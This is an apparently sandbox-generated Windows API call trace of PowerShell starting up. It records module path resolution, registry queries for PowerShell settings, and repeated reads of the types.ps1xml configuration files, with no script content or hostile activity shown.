	[0098.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.856] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0098.856] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0098.856] CoTaskMemFree (pv=0x28e180) 
	[0098.858] CoTaskMemAlloc (cb=0xcc) returned 0x29c8b0
	[0098.858] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x29c8b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0098.859] CoTaskMemFree (pv=0x29c8b0) 
	[0098.859] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xed8e8 | out: phkResult=0xed8e8*=0x328) returned 0x0
	[0098.859] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed86c, lpData=0x0, lpcbData=0xed868*=0x0 | out: lpType=0xed86c*=0x2, lpData=0x0, lpcbData=0xed868*=0x6c) returned 0x0
	[0098.860] CoTaskMemAlloc (cb=0x70) returned 0x21c430
	[0098.860] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed83c, lpData=0x21c430, lpcbData=0xed838*=0x6c | out: lpType=0xed83c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xed838*=0x6c) returned 0x0
	[0098.860] CoTaskMemFree (pv=0x21c430) 
	[0098.860] CoTaskMemAlloc (cb=0xcc) returned 0x29c8b0
	[0098.860] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x29c8b0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0098.860] CoTaskMemFree (pv=0x29c8b0) 
	[0098.860] CoTaskMemAlloc (cb=0xcc) returned 0x29c8b0
	[0098.860] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x29c8b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0098.860] CoTaskMemFree (pv=0x29c8b0) 
	[0098.863] RegCloseKey (hKey=0x328) returned 0x0
	[0098.863] CoTaskMemAlloc (cb=0xcc) returned 0x29c8b0
	[0098.863] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x29c8b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0098.864] CoTaskMemFree (pv=0x29c8b0) 
	[0098.864] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xed8e8 | out: phkResult=0xed8e8*=0x328) returned 0x0
	[0098.864] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed86c, lpData=0x0, lpcbData=0xed868*=0x0 | out: lpType=0xed86c*=0x0, lpData=0x0, lpcbData=0xed868*=0x0) returned 0x2
	[0098.864] RegCloseKey (hKey=0x328) returned 0x0
	[0098.869] CoTaskMemAlloc (cb=0x20c) returned 0x273940
	[0098.870] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x273940 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0098.871] CoTaskMemFree (pv=0x273940) 
	[0098.871] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xed470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0098.872] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0098.884] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0098.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.884] CoTaskMemFree (pv=0x28e180) 
	[0098.886] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0098.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.886] CoTaskMemFree (pv=0x28e180) 
	[0098.906] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0098.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.906] CoTaskMemFree (pv=0x28e180) 
	[0098.906] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0098.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.906] CoTaskMemFree (pv=0x28e180) 
	[0098.908] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed6d8 | out: phkResult=0xed6d8*=0x330) returned 0x0
	[0098.910] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xed6ec, lpData=0x0, lpcbData=0xed6e8*=0x0 | out: lpType=0xed6ec*=0x1, lpData=0x0, lpcbData=0xed6e8*=0x74) returned 0x0
	[0098.911] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xed65c, lpData=0x0, lpcbData=0xed658*=0x0 | out: lpType=0xed65c*=0x1, lpData=0x0, lpcbData=0xed658*=0x74) returned 0x0
	[0098.911] CoTaskMemAlloc (cb=0x78) returned 0x21c430
	[0098.911] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xed62c, lpData=0x21c430, lpcbData=0xed628*=0x74 | out: lpType=0xed62c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xed628*=0x74) returned 0x0
	[0098.911] CoTaskMemFree (pv=0x21c430) 
	[0098.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xed3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0098.911] SetErrorMode (uMode=0x1) returned 0x1
	[0098.911] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xed5b0 | out: lpFileInformation=0xed5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0098.911] SetErrorMode (uMode=0x1) returned 0x1
	[0098.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xed3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0098.912] SetErrorMode (uMode=0x1) returned 0x1
	[0098.912] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed5b0 | out: lpFileInformation=0xed5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0098.912] SetErrorMode (uMode=0x1) returned 0x1
	[0098.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xed3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0098.915] SetErrorMode (uMode=0x1) returned 0x1
	[0098.915] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed5b0 | out: lpFileInformation=0xed5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0098.915] SetErrorMode (uMode=0x1) returned 0x1
	[0098.942] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0098.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.942] CoTaskMemFree (pv=0x28e180) 
	[0098.947] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0098.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.948] CoTaskMemFree (pv=0x28e180) 
	[0098.949] GetACP () returned 0x4e4
	[0099.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0099.142] SetErrorMode (uMode=0x1) returned 0x1
	[0099.143] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0099.145] GetFileType (hFile=0x334) returned 0x1
	[0099.145] SetErrorMode (uMode=0x1) returned 0x1
	[0099.145] GetFileType (hFile=0x334) returned 0x1
	[0099.148] ReadFile (in: hFile=0x334, lpBuffer=0x2d8ed40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2d8ed40*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.151] ReadFile (in: hFile=0x334, lpBuffer=0x2d8ed40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2d8ed40*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.151] ReadFile (in: hFile=0x334, lpBuffer=0x2d8ed40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2d8ed40*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.152] ReadFile (in: hFile=0x334, lpBuffer=0x2d8ed40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2d8ed40*, lpNumberOfBytesRead=0xed4e8*=0xcf3, lpOverlapped=0x0) returned 1
	[0099.152] ReadFile (in: hFile=0x334, lpBuffer=0x2d8e19b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2d8e19b*, lpNumberOfBytesRead=0xed4e8*=0x0, lpOverlapped=0x0) returned 1
	[0099.152] ReadFile (in: hFile=0x334, lpBuffer=0x2d8ed40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2d8ed40*, lpNumberOfBytesRead=0xed4e8*=0x0, lpOverlapped=0x0) returned 1
	[0099.154] CloseHandle (hObject=0x334) returned 1
	[0099.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0099.160] SetErrorMode (uMode=0x1) returned 0x1
	[0099.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed460 | out: lpFileInformation=0xed460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0099.160] SetErrorMode (uMode=0x1) returned 0x1
	[0099.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xed190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0099.163] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed548 | out: phkResult=0xed548*=0x334) returned 0x0
	[0099.163] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed4cc, lpData=0x0, lpcbData=0xed4c8*=0x0 | out: lpType=0xed4cc*=0x1, lpData=0x0, lpcbData=0xed4c8*=0x56) returned 0x0
	[0099.163] CoTaskMemAlloc (cb=0x5a) returned 0x28a990
	[0099.163] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed49c, lpData=0x28a990, lpcbData=0xed498*=0x56 | out: lpType=0xed49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed498*=0x56) returned 0x0
	[0099.163] CoTaskMemFree (pv=0x28a990) 
	[0099.163] RegCloseKey (hKey=0x334) returned 0x0
	[0099.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xed190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0099.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xed040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0099.390] GetSystemInfo (in: lpSystemInfo=0xec180 | out: lpSystemInfo=0xec180*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0099.390] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0099.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0099.402] SetErrorMode (uMode=0x1) returned 0x1
	[0099.402] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0099.402] GetFileType (hFile=0x334) returned 0x1
	[0099.403] SetErrorMode (uMode=0x1) returned 0x1
	[0099.403] GetFileType (hFile=0x334) returned 0x1
	[0099.509] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.509] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.510] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.510] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.510] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.510] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.510] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.510] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.511] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.512] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.512] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.512] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.513] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.513] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.575] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.576] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.576] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.578] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.578] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.578] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.579] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.579] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.579] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.580] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.580] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.580] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.580] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.581] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.581] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.581] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.581] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.582] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.582] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.585] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.585] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
